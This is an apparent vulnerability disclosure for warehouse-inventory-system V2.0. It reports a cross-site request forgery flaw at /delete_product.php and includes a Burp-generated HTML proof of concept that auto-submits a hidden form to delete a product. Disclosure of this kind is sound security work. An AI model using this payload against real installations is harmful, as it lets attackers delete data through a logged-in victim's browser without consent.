warehouse-inventory-system_CSRF_12.md

[description]

warehouse-inventory-system was discovered to contain Cross-site request forgery(CSRF) vulnerability via the URI /delete_product.php.

---

[Vulnerability Type]

Cross-site request forgery(CSRF)

---

[Vendor of Product]

OSWAPP,https://github.com/siamon123/warehouse-inventory-system

---

[Affected Product Code Base]

V2.0

---

[Impact Escalation of Privileges]

true

---

[POC]

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://192.168.0.183:11180/delete_product.php">
      <input type="hidden" name="id" value="3" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>